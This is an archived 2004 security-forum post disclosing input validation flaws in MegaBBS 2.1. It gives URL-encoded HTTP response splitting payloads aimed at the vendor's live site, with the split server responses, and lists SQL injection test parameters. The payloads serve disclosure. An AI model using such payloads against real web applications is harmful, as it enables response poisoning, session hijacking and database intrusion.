Help
-
Search
-
Member List
-
Calendar
Full Version:
Megabbs Input Validation Errors
GovernmentSecurity.org
>
The Archives
>
Exploit Articles
qcred11
Sep 28 2004, 02:23 AM
QUOTE
URL:
http://www.pd9soft.com
Tested megabbs 2.1
1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thre...writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>
2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thre...%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>
3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
Source:
http://www.securitytracker.com/alerts/2004/Sep/1011420.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here
.
Invision Power Board © 2001-2005
Invision Power Services, Inc.
